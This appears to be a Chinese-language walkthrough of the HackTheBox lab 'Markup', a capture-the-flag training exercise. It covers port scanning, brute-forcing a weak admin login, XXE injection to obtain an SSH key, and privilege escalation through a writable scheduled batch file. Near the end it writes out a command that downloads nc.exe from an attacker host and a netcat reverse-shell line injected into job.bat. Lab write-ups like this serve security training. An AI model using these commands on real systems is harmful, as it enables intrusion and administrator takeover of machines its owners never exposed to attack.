HackTheBox Markup
0x000 信息收集
生成环境,获取到ip
端口扫描
nmap -sV -p- 10.129.95.192 --min-rate 5000
网站后台弱口令
访问主页,发现这是一个登陆界面,既然没有验证码,尝试burpsuite跑一下弱口令。
这里成功爆破到账号密码:amdin:password
成功进入后台
0x001 漏洞利用
XXE外部实体注入漏洞
抓包测试一下 http://10.129.95.192/services.php 页面
根据截取的请求包,发现xml版本是1.0
XXE外部实体注入漏洞:https://portswigger.net/web-security/xxe
构造payload发送请求
本地开启http服务,发现目标主机有访问请求过来
这里提示我们在网页代码里能找到什么用户
最后在 http://10.129.95.192/services.php 页面找到了用户Daniel
此时嘴角微微上扬,但是现实打脸了,很显然没成功。
查找原因,发现目标系统是windows
,我淦
这次成功执行了
0x002 提权
ssh密钥登陆daniel
将密钥写入到id_rsa文件中,赋予600权限
ssh -i id_rsa daniel@10.129.95.192
这里提示Log-Management目录下有什么文件
查看job.bat文件
wevtutil.exe 允许我们检索有关事件日志和发布者的信息,尝试执行脚本,但是失败了,必须得以管理员运行
icacls job.bat检查文件权限,发现BUILTIN\Users具有读写权限,所以意味着daniel用户同样具有读写权限。
使用powershell
使用命令ps
查看当前正在运行的进程
通过ps命令发现,wevtutil是每隔一段时间执行的
思路:此时可以上传nc.exe工具,将反弹shell命令写入job.bat,从而获取administrator权限。
curl -O http://Attack_IP:8000/nc.exe
echo C:\Log-Management\nc.exe -e cmd.exe 10.10.14.40 6666 > job.bat
等待任务执行